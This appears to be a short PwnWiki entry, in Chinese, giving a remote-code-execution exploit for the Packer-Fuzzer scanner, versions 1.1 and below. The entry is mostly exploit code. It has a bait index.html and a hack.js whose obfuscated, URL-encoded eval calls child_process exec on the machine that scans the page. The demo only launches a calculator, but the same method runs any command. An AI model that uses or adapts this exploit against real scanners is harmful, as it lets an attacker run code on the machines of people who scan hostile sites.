Packer-Fuzzer漏洞掃描工具RCE 0day

From PwnWiki

影響版本

v1.1或者以下版本

EXP

index.html

<html>
    <noscript>naive!</noscript>
    <body>
        <script src="./hack.js"></script>
    </body>
</html>

hack.js

document.createElement("script");
q.p+"";eval(decodeURI("require(%27child_process%27).e%78ec(%27mate-calc%27)"));//"{114514:;[s].js